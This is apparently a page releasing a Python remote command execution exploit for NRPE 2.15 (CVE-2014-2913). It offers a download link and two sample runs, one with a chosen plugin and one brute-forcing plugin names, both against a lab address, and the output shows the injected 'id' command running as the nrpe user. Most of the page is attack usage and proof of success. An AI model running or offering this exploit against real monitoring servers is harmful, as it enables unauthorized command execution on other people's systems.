NRPE 2.15 Remote Command Execution python Exploit – CVE-2014-2913

Download Exploit: HERE

Custom Command Mode:

claudio@backbox3:~/Desktop$ ./nrpe_215_rce_exploit.py -H 10.0.0.70 --cmd="id" -c check_users


$$\   $$\ $$$$$$$\  $$$$$$$\  $$$$$$$$\        $$$$$$\        $$\  $$$$$$$\
$$$\  $$ |$$  __$$\ $$  __$$\ $$  _____|      $$  __$$\     $$$$ | $$  ____|
$$$$\ $$ |$$ |  $$ |$$ |  $$ |$$ |            \__/  $$ |    \_$$ | $$ |
$$ $$\$$ |$$$$$$$  |$$$$$$$  |$$$$$\           $$$$$$  |      $$ | $$$$$$$\
$$ \$$$$ |$$  __$$< $$  ____/ $$  __|         $$  ____/       $$ | \_____$$\
$$ |\$$$ |$$ |  $$ |$$ |      $$ |            $$ |            $$ | $$\   $$ |
$$ | \$$ |$$ |  $$ |$$ |      $$$$$$$$\       $$$$$$$$\ $$\ $$$$$$\$$$$$$  |
\__|  \__|\__|  \__|\__|      \________|      \________|\__|\______|\______/



                  $$$$$$$\   $$$$$$\  $$$$$$$$\
                  $$  __$$\ $$  __$$\ $$  _____|
                  $$ |  $$ |$$ /  \__|$$ |
                  $$$$$$$  |$$ |      $$$$$\
                  $$  __$$< $$ |      $$  __|
                  $$ |  $$ |$$ |  $$\ $$ |
                  $$ |  $$ |\$$$$$$  |$$$$$$$$\
                  \__|  \__| \______/ \________|
                                                   NRPE <= 2.15 R3m0t3 C0mm4nd Ex3cut10n


                =============================================
                - Release date: 17.04.2014
                - Discovered by: Dawid Golunski
                - Severity: High
                - CVE: 2014-2913
                =============================================

                                Written by:

                              Claudio Viviani

                           http://www.homelab.it

                              [email protected]
                           [email protected]

                      https://www.facebook.com/homelabit
                      https://twitter.com/homelabit
                      https://plus.google.com/+HomelabIt1/
            https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww


[+] Target: 10.0.0.70
[+] Command: id 

[+] Custom command Mode....
[+]
[+] Connecting......
[+] Checking for NRPE command check_users: VULNERABLE!
[+]
[+] Max Output CHAR 1024 (According to NRPE <= 2.15 specifications)
[+]
[+] Please ignore NRPE plugin command messages (Usage or Errors)
[+]
Usage:
check_users -w <users> -c <users>
uid=496(nrpe) gid=497(nagios) gruppi=496(nrpe),497(nagios)

Brute Force Mode:

claudio@backbox3:~/Desktop$ ./nrpe_215_rce_exploit.py -H 10.0.0.70 --cmd="id" -b


$$\   $$\ $$$$$$$\  $$$$$$$\  $$$$$$$$\        $$$$$$\        $$\  $$$$$$$\
$$$\  $$ |$$  __$$\ $$  __$$\ $$  _____|      $$  __$$\     $$$$ | $$  ____|
$$$$\ $$ |$$ |  $$ |$$ |  $$ |$$ |            \__/  $$ |    \_$$ | $$ |
$$ $$\$$ |$$$$$$$  |$$$$$$$  |$$$$$\           $$$$$$  |      $$ | $$$$$$$\
$$ \$$$$ |$$  __$$< $$  ____/ $$  __|         $$  ____/       $$ | \_____$$\
$$ |\$$$ |$$ |  $$ |$$ |      $$ |            $$ |            $$ | $$\   $$ |
$$ | \$$ |$$ |  $$ |$$ |      $$$$$$$$\       $$$$$$$$\ $$\ $$$$$$\$$$$$$  |
\__|  \__|\__|  \__|\__|      \________|      \________|\__|\______|\______/



                  $$$$$$$\   $$$$$$\  $$$$$$$$\
                  $$  __$$\ $$  __$$\ $$  _____|
                  $$ |  $$ |$$ /  \__|$$ |
                  $$$$$$$  |$$ |      $$$$$\
                  $$  __$$< $$ |      $$  __|
                  $$ |  $$ |$$ |  $$\ $$ |
                  $$ |  $$ |\$$$$$$  |$$$$$$$$\
                  \__|  \__| \______/ \________|
                                                   NRPE <= 2.15 R3m0t3 C0mm4nd Ex3cut10n


                =============================================
                - Release date: 17.04.2014
                - Discovered by: Dawid Golunski
                - Severity: High
                - CVE: 2014-2913
                =============================================

                                Written by:

                              Claudio Viviani

                           http://www.homelab.it

                              [email protected]
                           [email protected]

                      https://www.facebook.com/homelabit
                      https://twitter.com/homelabit
                      https://plus.google.com/+HomelabIt1/
            https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww


[+] Target: 10.0.0.70
[+] Command: id 

[+] Brute force Mode....
[+]
[-] Checking for NRPE command check_all:            not found
[-] Checking for NRPE command check_apt:            not found
[-] Checking for NRPE command check_bdii:            not found
[-] Checking for NRPE command check_bonding:            not found
[-] Checking for NRPE command check_breeze:            not found
[-] Checking for NRPE command check_by_ssh:            not found
[-] Checking for NRPE command check_check-updates:            not found
[-] Checking for NRPE command check_check_sip:            not found
[-] Checking for NRPE command check_cluster:            not found
[-] Checking for NRPE command check_dhcp:            not found
[-] Checking for NRPE command check_dig:            not found
[+] Checking for NRPE command check_disk:            VULNERABLE!
[+]
[+] Max Output CHAR 1024 (According to NRPE <= 2.15 specifications)
[+]
[+] Please ignore NRPE plugin command messages (Usage or Errors)
[+]
Unknown argument
Usage:
 check_disk -w limit -c limit [-W limit] [-K limit] {-p path | -x device}
[-C] [-E] [-e] [-g group ] [-k] [-l] [-M] [-m] [-R path ] [-r path ]
[-t timeout] [-u unit] [-v] [-X type]
uid=496(nrpe) gid=497(nagios) gruppi=496(nrpe),497(nagios)